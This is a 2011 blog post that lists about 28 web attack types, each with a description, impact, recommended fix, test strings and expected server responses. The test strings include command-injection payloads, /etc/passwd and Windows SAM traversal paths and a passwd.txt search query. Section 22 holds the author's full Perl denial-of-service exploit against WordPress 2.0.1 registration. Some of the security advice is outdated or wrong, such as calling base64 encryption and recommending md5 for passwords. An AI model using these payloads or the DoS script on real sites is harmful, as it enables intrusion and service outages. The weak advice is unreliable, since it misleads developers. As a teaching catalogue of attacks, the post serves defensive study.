Receive Daily Updates

Enter your email address:

Monday, June 13, 2011

Most of Web Attacks

I will be explaining most of web attacks here,just pay attention. 1.)SQL injection a)Description SQL injection allows an attacker to execute sql commands on the server that he is attacking b)Impact An attacker may execute arbitrary SQL statements on the vulnerable system. This may compromise the integrity of your database and/or expose sensitive information.Depending on the back-end database in use, SQL injection vulnerabilities lead to varying levels of data/system access for the attacker. It may be possible to not only manipulate existing queries, but to UNION in arbitrary data, use subselects, or append additional queries. In some cases, it may be possible to read in or write out to files, or to execute shell commands on the underlying operating system.Certain SQL Servers such as Microsoft SQL Server contain stored and extended procedures (database server functions). If an attacker can obtain access to these procedures it may be possible to compromise the entire machine. c)Recommendation Allow only a-zA-Z0-9 characters d)Testing string/s ('), (/), (\), (#), (") (--), (-), (*) e)Response 200 OK, database error messages, redirection to another page 2.)Cross Site Scripting (XSS) a)Description Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually in the form of Javascript) to another user. Because a browser cannot know if the script should be trusted or not, it will execute the script in the user context allowing the attacker to access any cookies or session tokens retained by the browser. It's XSS because CSS means "Cascading Style Sheets" b)Impact Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable application to fool a user in order to gather data from them. An attacker can steal the session cookie and take over the account, impersonating the user. It is also possible to modify the content of the page presented to the user. c)Recommendation Allow only a-zA-Z0-9 characters or use the function htmlspecialchars(); for php d)Testing string/s (), ([script]alert();[/script]), (), () e)Response 200 OK, a poup-up message with your cookies 3.)Cross site request forgery (CSRF) a)Description Cross-Site Request Forgeries (CSRF) are an almost opposite style of attack. Rather than exploiting the trust that a user has for a Web site, they exploit the trust that a Web site has for a user. In the case of the XSS attacks we just discussed, the user is the victim. In the case of CSRF, the user is an unknowing accomplice. b)Impact An attacker may put a link on a forum and when someone clicks the link he will send a message to the server forum.This may couse a flood c)Recommendation -Use POST instead of GET method -Request authorization -Check the Referer -Every request has to be unique d)Testing string/s
Subject: Message: This way the attacker will flood the server and he could bypass firewall protection seanse the flooders would be people that don't know what they are doing e) Response 200 OK, successful redirection 4.)PHP injection a)Description PHP code injection is a vulnerability that allows an attacker to inject custom code into the server side scripting engine. This vulnerability occurs when an attacker can control all or part of an input string that is fed into an eval() function call. Eval will execute the argument as code. b)Impact Malicious users may inject PHP code which will be executed on the server side. It's possible to run system commands if the PHP interpreter allows system() or similar functions. c)Recommendation Allow only a-zA-Z0-9 characters and set php.ini as it follows: engine = off register_globals = off magic_quotes_gpc = off magic_quotes_runtime = Off magic_quotes_sybase = Off session.use_trans_sid = off session.use_only_cookies = 1 safe_mode = on safe_mode_gid = Off safe_mode_include_dir = Off safe_mode_exec_dir = Off allow_url_fopen = off open_basedir = '/home/sheib/public_html/unsafe' //edit this file_uploads = off display_errors = off log_errors = on expose_php = off error_reporing = E_ALL session.save_path ="/tmp" //edit this if you want post_max_size = 8M disable_functions = exec, passthru, proc_open, shell_exec, system, popen, pcntl_fork, pcntl_exec, fsockopen, pfsockopen, socket_bind, socket_accept, socket_listen, socket_create, stream_socket_client, stream_socket_server, dl, glob, posix, include, include_once, require and require_once, fopen, readfile, file, imagecreatefromXXX, phpinfo, eval, chroot, suexec, Limits *addslashes/stripslashes/magic_quotes_gpc won't help much *when sending data use $_GET/$_POST and for authentication $_SESSION instead of register_globals *Don't count on encryption functions like urlencode or base64_encode use md5 hashing d)Testing string/s (), (system(base64_decode(YWRtaW4=) #admin), ('.passthru($_GET[cmd]).'&cmd=id), (phpinfo() e)Responce 200 OK, test, admin, uid... 5.)PERL injection a)Description Like php injection, perl injection would be the same but the differences is that you inject perl code not php b)Impact Malicious users may inject perl code which will be executed on the server side. c)Recommendation Allow only a-zA-Z0-9 characters and use no warnings; d)Testing string/s (perl -e system(ipconfig)), (perl -e exec(ipconfig)), (perl -e \'print 'foo'\) e)Responce 200 OK, Windows IP Configuration, foo 6.)Path disclosure a)Description Contains an error message that discloses the installation path and other data. b)Impact A remote user can determine the full path to the web root directory and other potentially sensitive information. c)Recommendation Allow only a-zA-Z0-9 characters and turn off error messages depending on the script d)References -> "Penetration Testing for Web Applications (Part Two)" by Jody Melbourne and David Jorm e)Testing string/s (/), (\) f)Responce 200 OK, Warning message 7.)ASP injection a)Description Like php or perl injection, asp injection would be the same but the differences is that you inject asp code not php/perl *Note* ASP injection is possbile only on windows machines running IIS b)Impact Malicious users may inject asp code which will be executed on the server side. c)Recommendation Allow only a-zA-Z0-9 characters and dissable the following functions: sp_makewebtask xp_startmail xp_sendmail xp_cmdshell xp_regwrite d)Testing string/s (<%@ LANGUAGE = 'JScript' %> <% Response.Write('Test'); %>;) f)Responce 200 OK, Test 8.)Source code disclosure a)Description It is possible to read the source code of a script by using script filename as a parameter. It seems that the script includes a file which name is determined using user-supplied data. This data is not properly validated before being passed to the include function. b)Impact An attacker can gather sensitive information (database connection strings, application logic) by analysing the source code. This information can be used to launch further attacks. c)Recommendation Analyse the source code of this script and solve the problem. d)References -> "Source Code Disclosure" by Impreva e)Testing string/s request the file itself f)Responce 200 OK, 8.Server side includes (SSI) a)Description Server Side Includes or SSI is an easy server-side scripting language used almost exclusively for the web. As its name implies, its primary use is including the contents of a file into another, via a Web Server. SSI is primarily used to "paste" the contents of one or more files into another. For example, a file (of any type, .htm, .txt, etc.) containing a daily quote, could be included into multiple SSI Enabled pages throughout a website, by placing the following code into the desired pages. With one change of the quote.txt file, pages including the snippet will display the latest daily quote. Server Side Includes are useful for including a common piece of code throughout a site, such as a navigation menu. In order for a web server to recognise a SSI-enabled HTML file and therefore carry out these instructions, the file must end with the .shtml extension. SSI files can also end with .shtm but this depends on the servers ability to recognise the extension. b)Impact An attacker can execute commands on the server c)Recommendation turn off SSI d)References -> "Server Side Includes" by Wikipedia e)Testing string/s f)Responce 200 OK, root, uid.... 9.)Code execution a)Description Code execution vulnerabilities occur where the output or content served from a Web application can be manipulated in such a way that it triggers server-side code execution. In some poorly written Web applications that allow users to modify server-side files (such as by posting to a message board or guestbook) it is sometimes possible to inject code in the scripting language of the application itself. b)Impact A malicious user may execute arbitrary system commands with the permissions of the web server. c)Recommendation *Allow only a-zA-Z0-9 characters *Turn on safe_mode *Dissable exec, passthru, proc_open, shell_exec, system, popen, pcntl_fork, pcntl_exec *Set permitions so that only root can execute commands *Use escapeshellcmd or escapeshellarg d)References -> "Penetration Testing for Web Applications (Part Two)" by Jody Melbourne and David Jorm -> "PHP Top 5" by Owasp e)Testing string/s (|id|), ($(id)), (; id), (| id), (&& id) (|| id), (> id), (<> f)Responce 200 OK, uid... 10.File inclusion a)Description An attacker could include a remote or local file and execute commands on the server b)Impact It is possible for a remote attacker to include a file from local or remote resources and/or execute arbitrary script code with the privileges of the webserver. c)Recommendation *allow_url_fopen = off *use file_exists(); function to validate if the file is valid *disable user control d)References -> "Using remote files" -> "Code Injection Vulnerabilities Explained" by The Server Pages -> "PHP Top 5" by Owasp e)Testing string/s f)Responce 200 OK, uid.... 11.)Directory Traversal a)Description Directory Traversal is a vulnerability which allows attackers to access restricted directories and execute commands outside of the web server's root directory. b)Impact By exploiting directory traversal vulnerabilities, attackers step out of the root directory and access files in other directories. As a result, attackers might view restricted files or execute commands, leading to a full compromise of the Web server. c)Recommendation *Allow only a-zA-Z0-9 characters only *Set open_basedir *Set display_errors to off d)References -> "Directory Traversal Attacks" by Acunetix -> "Security and Safe Mode" -> "Penetration Testing for Web Applications (Part Two)" by Jody Melbourne and David Jorm -> "Directory traversal" by Wikipedia -> "Directory Traversal" by Imperva -> "phpBB Attachment Mod Directory Traversal HTTP POST Injection" by Paul Laudanski e)Testing string/s (../) (../../../../../../../../etc/passwd) f)Responce 200 OK, directory listening, root 12.)Cross Frame scripting (XFS) a)Description This is an attack technique used to trick a user into thinking that fake web site content is legitimate data. b)Impact Malicious users may poison a frame allowing them to conduct phishing attacks. c)Recommendation Allow only a-zA-Z0-9 characters and verfy the data send by the user d)References -> "The Phishing Guide" by Gunter Ollmann e)Testing string/s f)Responce 13.)CGI security checks a)Description CGI security checks are used to see if the Common Gateway Interface of a site is vulnerable to old/new bugs b)Impact Malicious users may execute commands or do something else depending on the bug c)Recommendation Keep updated your server and software d)References -> "CGI script security" by Lincoln D. Stein and John N. Stewart -> "Safe CGI Programming" by Paul Phillips -> "CGI security holes" by Jennifer Myers e)Testing string/s /.%252e/.%252e/.%252e/winnt/repair/sam._ /..%252f..%252f..%252f..%252f..%252f../windows/repair/sam /..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam /..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam._ /..%255c..%255c..%255c..%255c..%255c../windows/repair/sam /..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam /..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam._ /..%2F..%2F..%2F..%2F..%2F../windows/repair/sam /..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam /..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam._ f)Response 200 OK 14.)Cookie attacks a)Description By injecting a custom HTTP header or by injecting a META tag is possible to alter the cookies stored in the browser. Attackers will normally manipulate cookie values to fraudulently authenticate themselves on a web site. b)Impact By exploiting this vulnerability, an attacker may conduct a session fixation attack. In a session fixation attack, the attacker fixes the user's session ID before the user even logs into the target server, thereby eliminating the need to obtain the user's session ID afterwards. c)Recommendation You need to filter the output in order to prevent the injection of custom HTTP headers or META tags. Additionaly, with each login the application should provide a new session ID to the user. d)References -> "Session Fixation Vulnerability In Web-based Applications" by Mitja Kolsek -> "Session Fixation" by Web Application Security Consortium -> "Session Handling Functions" -> "Hacking Web Applications Using Cookie Poisoning" by Amit Klein -> "Penetration Testing for Web Applications (Part Three)" by Jody Melbourne and David Jorm e)Testing string/s (Set-Cookie: cookiename=cookievalue) () f)Response 200 OK, new cookie that contains your data 15.)Http response splitting/CRLF injection a)Description HTTP headers have the structure "Key: Value", where each line is separated by the CRLF combination. If the user input is injected into the value section without properly escaping/removing CRLF characters it is possible to alter the HTTP headers structure. HTTP Response Splitting is a new application attack technique which enables various new attacks such as web cache poisoning, cross user defacement, hijacking pages with sensitive user information and cross-site scripting (XSS). The attacker sends a single HTTP request that forces the web server to form an output stream, which is then interpreted by the target as two HTTP responses instead of one response. b)Impact Is it possible for a remote attacker to inject custom HTTP headers. For example, an attacker can inject session cookies, spoof mail headers or execute HTML code. This may conduct to vulnerabilities like XSS (cross-site scripting) or session fixation. c)Recommendation You need to restrict CR(0x13)(\r) and LF(0x10)(\n) from the user input or properly encode the output in order to prevent the injection of custom HTTP headers. d)References -> "CRLF Injection Attack" by Acunetix -> "CRLF Injection" by Ulf Harnhammar -> "HTTP Response Splitting, Web Cache Poisoning Attacks, and Related Topics" by Amit Klein -> "Introduction to HTTP Response Splitting" by dcrab -> "Header Based Exploitation: Web Statistical Software Threats" by Cgisecurity -> "TCP Port 80 - HyperText Transfer Protocol (HTTP) Header Exploitation" by William Bellamy Jr. e)Testing string/s Where our headers will look like: CC: [email protected] Bcc: [email protected] And if we change our url to , mail2, mail3\r\n&subject=foo&message=moofoo And we just did a mail spoofing attack f)Responce 200 OK, changed headers, redirection to another page 16.)Buffer overflow a)Description It is almost impossible to find today a buffer overflow in a web application but still there are some scripts that use C\C++\C# code in them b)Impact An attacker could execute commands on the server and even get root privileges c)Recommendation Analyse the source code of your C\C++\C# program and fix all possible overflows *For Microsoft Visual C++ .NET you can use /GS (Buffer Security Check) when compiling to see if there are any possible overflows and /Gs (Control Stack Checking Calls) but be careful when using /Gs d)References -> "Myth-Busting Web Application Buffer Overflows" by Jeremiah Grossman -> "Buffer overflow" by Wikipedia e)Testing string/s . 5000 A's f)Responce 500 International Server Errors, 0x41414141 or something simular 17.)Format String a)Description Format string attacks are a new class of vulnerabilities discovered around 1999, previously thought harmless. Format string attacks can be used to crash a program or to execute harmful code. The problem stems from the use of unfiltered user input as the format string parameter in certain C functions that perform formatting, such as printf() b)Impact A malicious user may use the %s and %x format tokens, among others, to print data from the stack or possibly other locations in memory. One may also write arbitrary data to arbitrary locations using the %n format token, which commands printf() and similar functions to write back the number of bytes formatted to the same argument to printf(), assuming that the corresponding argument exists, and is of type int * . c)Recommendation Analyse the source code of your C\C++\C# program and fix all possible overflows d)References -> "Format String Attack" by Web Application Security Consortium -> "Format string attack" by Wikipedia e)Testing string/s (%f), (%p), (%n) f)Responce Error message, something like 0x0804960c and so on... 18.)Integer Overflow a)Description In computer programming, an integer overflow is an anomalous condition which may cause a buffer overflow, resulting in a computer security risk where adjacent, valid program control data may be overwritten, permitting the execution of arbitrary, and potentially harmful code. b)Impact A malicious user may create a buffer overflow condition and execute commands on the server c)Recommendation Analyse the source code of your C\C++\C# program and fix all possible overflows d)References -> "Basic Integer Overflows" by blexim -> "Integer overflow" by Wikipedia e)Testing string/s 65535 f)Responce Error message, something like 0x0000ffff and so on... 19.)LDAP Injection a)Description Lightweight Directory Access Protocol (LDAP) is an open-standard protocol for both querying and manipulating X.500 directory services. When a web application fails to properly sanitize user-supplied input, it is possible for an attacker to alter the construction of an LDAP statement. b)Impact When an attacker is able to modify an LDAP statement, the process will run with the same permissions as the component that executed the command. (e.g. Database server, Web application server, Web server, etc.). This can cause serious security problems where the permissions grant the rights to query, modify or remove anything inside the LDAP tree. c)Recommendation Allow only a-zA-Z0-9 characters d)References -> "Lightweight Directory Access Protocol" by Wikipedia -> "LDAP Injection" by Web Application Security Consortium -> "LDAP Injection" by Sacha Faust -> "A String Representation of LDAP Search Filters" by Tim Howes -> LDAP resources e)Testing string/s ()), (*) f)Responce Redirection, error message containing information 20.)XPath Injection a)Description This script is possibly vulnerable to XPath Injection attacks.XPath Injection is an attack technique used to exploit web sites that construct XPath queries from user-supplied input. b)Impact An unauthenticated attacker may extract a complete XML document using XPath querying. This may compromise the integrity of your database and expose sensitive information. c)Recommendation Allow only a-zA-Z0-9 characters d)References -> "XPath injection in XML databases" by Runa Dwibedi -> "XPath Injection" by Web Application Security Consortium -> "XML Path Language (XPath)" by W3C -> "Encoding a Taxonomy of Web Attacks with Different-Lenght Vectors" by Gonzalo Alvarez and Slobodan Petrovic "Blind Xpath Injection" by Amit Klein e)Testing string/s ('), (/), (\), (#), (") (--), (-), (*) f)Responce Full content of XML document 21.)URL redirection a)Description This script is possibly vulnerable to URL redirection attacks. URL redirection is sometimes used as a part of phishing attacks that confuse visitors about which web site they are visiting. b)Impact A remote attacker can redirect users from your website to a specified URL. This problem may assist an attacker to conduct phishing attacks, trojan distribution, spammers. c)Recommendation Your script should properly sanitize user input. d)References -> "Google can be Exploited to Assist Phishing Attacks" by NIST IT SECURITY e)Testing string/s ('), (/), (\), (#), (") (--), (-), (*) f)Responce 200 OK, redirection to another page 22.Web Application DoS a)Description Web application DoS (Denial of Service) is an attack that sends mutlyple requests with a very large size to a server b)Impact Computer crash, service crash, SQL crash c)Recommendation Preventing web application dos and not only on web applications isn't that hard but protecting against DDOS (Distributed Denial Of Service) is impossible.Anyway here are some tips: *Use POST instead of GET *Make a function that will stop mutlyple POST/GET requests to your site from the same user.If the user makes a requests 3-4 times the stop his ip from requesting anything on your site for 5-10 minutes and log his ip *POST requests should not be more longer then 8 MB *When specifying a maxsize value be sure to make a check function so that the attacker can't make it longer then it is d)References -> "Denial-of-service attack" by Wikipedia -> "Denial of Service Attacks" by CERT -> "Application Denial of Service (DOS) Attacks" by Stephen de Vries -> "Attacking DDoS at the Source" by Jelena Mirkovic, Gregory Prier and Peter Reiher e)Testing string/s Here is my wordpress crash exploit: #!perl #Greets ot all omega-team members + h4cky0u[h4cky0u.org], lessMX6 and all dudes from #DevilDev wink.gif #The exploit was tested on 10 machines but not all got flooded.Only 6/10 got crashed use Socket; if (@ARGV <> $rand=rand(10); $host = $ARGV[0]; $dir = $ARGV[1]; smile.gif { $user="\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x66\x6f\x6f".$rand.$i; #you N33d t0 be l33t t0 s33 th!S ! $data = "action=register&user_login=$user&user_email=$user\@matrix.org&submit=Register+%C2%BB"; $len = length $data; $foo = "POST ".$dir."wp-register.php HTTP/1.1\r\n". "Accept: *\r\n". "Accept-Language: en-gb\r\n". "Content-Type: application/x-www-form-urlencoded\r\n". "Accept-Encoding: gzip, deflate\r\n". "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n". "Host: $host\r\n". "Content-Length: $len\r\n". "Connection: Keep-Alive\r\n". "Cache-Control: no-cache\r\n\r\n". "$data"; my $port = "80"; my $proto = getprotobyname('tcp'); socket(SOCKET, PF_INET, SOCK_STREAM, $proto); connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo; send(SOCKET,"$foo", 0); syswrite STDOUT, "+"; } #s33 if the server is down print "\n\n"; system('ping $host'); sub usage { print "\n\t(W)ordpress 2.0.1 emote (D)oS (E)xploit (cool.gify matrix_killer\n"; print "\te-mail: matrix_k\@abv.bg\n"; print "\tusage: \n"; print "\t$0 \n"; print "\tex: $0 127.0.0.1 /woredpress/\n"; print "\tex2: $0 127.0.0.1 / (if there isn't a dir)\n"; exit(); }; #Wordpress answer: #A) DOS shouldn't be handled by a PHP application, there are much more efficient and better ways to deal with this. cool.gif Registration is off by default, so the severity of this sort of DOS is rather low. #Well I like giving my own patches or security solutions when I find a bug but this time I agree with the wordpress developers f)Responce Server crash, service crash, almost impossible to move your mouse 23.)Hidden field manipulation a)Description Hidden fields are used for sending a unique value to the server that cannot be edited by the user.But if the user decides to see the html source hi will see the hidden field and he could change it b)Impact A remote attacker can change values to different products(if we are talking about a shop or something simular) or cause a server crash c)Recommendation Make a function that will not accept any other value then the one in the hiddien field d)References -> "Penetration Testing for Web Applications (Part One)" by Jody Melbourne and David Jorm e)Testing string/s The attacker sees this and saves the html on his hard drive.From then he just changes the value of 7.10 to let's say 2 f)Responce 200 OK, acception of the value from the server 24.)Authentication attacks a)Description Authentication plays a very important role in security.We use it to identify someone by a special value, cookie, session or something like that b)Impact If an attacker bruteforces or gets somehow the unique identification value of the person he want's then he could authenticate as him c)Recommendation *Use SSL on your sites *When user logs his cookie or whatever it is has to be unique and used only once.That means that when he logouts the cookie has to be destroyd and the next time a new should be created *Authentication keys should be long and encrypted.Use base64 encryption or md5 hashing *It would be good to have a ip log function *Authorization should be required to prevent spoofing/hijacking attacks d)References -> "Authentication Hacking Attacks" by Acunetix -> "Spoofing papers" by Internet Security Systems -> "Spoofing attack" by Wikipedia -> "Web Spoofing" by Department of Computer Science -> "Hijacking" by Wikipedia e)Testing string/s And if there is a id 4256467 you will be logged f)Responce 200 OK, succesful authentication 25.)Authorization attacks a)Description While authentication requires a unique value, authorization requests a username/password value b)Impact If an attacker has the username/password value he can log in as the user c)Recommendation *Passwords should be long and complex.Atleast 14 characters long and should contain atleast 5-6 special symbols from the keyboard *Log ip's that make 6 unseccesful login tryes and bann them for 5-10 minutes *Use md5 hashing *Use SSL d)References -> "Authentication Hacking Attacks" by Acunetix e)Testing string/s From then the attacker only tryes different username and password combinations to log in f)Responce 200 OK, acception of the username and password from the server 26.)Web pilfering/crawling a)Description This attack is used to search a hole site or parts of it for password files, hidden fields and other sensitive information b)Impact An attacker could get a lot of information about a site and even passwords c)Recommendation *Don't hide sensitive data in html *Check your logs for multyple GET requests d)References "Web crawler" by Wikipedia "Distributed web crawling" by Wikipedia e)Testing string/s GET /the_html_document.htlm ..... f)Responce 200 OK, hidden info 27.)Domain Hijacking a)Description This attack is used to take over domain names b)Impact An attacker could steal a domain name and from then he could use it for phishing scames c)Recommendation See the links below d)References -> "Domain Hijacking: A step-by-step guide" by CCpower -> "Domain hijacking" by Wikipedia e)Testing string/s f)Responce Changed domain settings 28.)Google a)Description Google attacks are based on found already attacks b)Impact It depends on the hole c)Recommendation Remove all pages identified by Google hacking queries d)References -> Google Hacking Database (GHDB) -> "Google hacking" by Acunetix e)Testing string/s inurl:passwd.txt site:yoursite.com f)Responce 200 OK Final words: As you can see in almost all of the attacks the best solution is to allow only az-AZ0-9 characters.Well there are other type of protection methods too but they could be bypassed.As an example addslashes could be bypassed with %2527.If you are worring about how much time it will cost you to scan your site for all these attacks well then you could use some of the following scanners: Greets: Bl0od3r, EcLiPsE, Acid_BDS, Alpha-fan and everyone from h4cky0u.org

2 Visitor Reactions & Comments:

Kavita Sharma said...

I want to create a blog just like yours and am a newbie on the internet. Where could I get a design like this? Thanks so much. -Ginger raspberry ketone supplement

used construction equipment said...

I must declare, as much as I enjoyed reading what you had to say, I couldnt help but lose interest after a while. Its as if you had a fantastic grasp on the subject matter, but you forgot to include your us your readers. Perhaps you should think about this from far more than one angle. Or maybe you shouldnt generalize so considerably. Its better if you think about what others may have to say instead of just going for a gut reaction to the subject. Think about adjusting your own belief process and giving others who may read this the benefit of the doubt.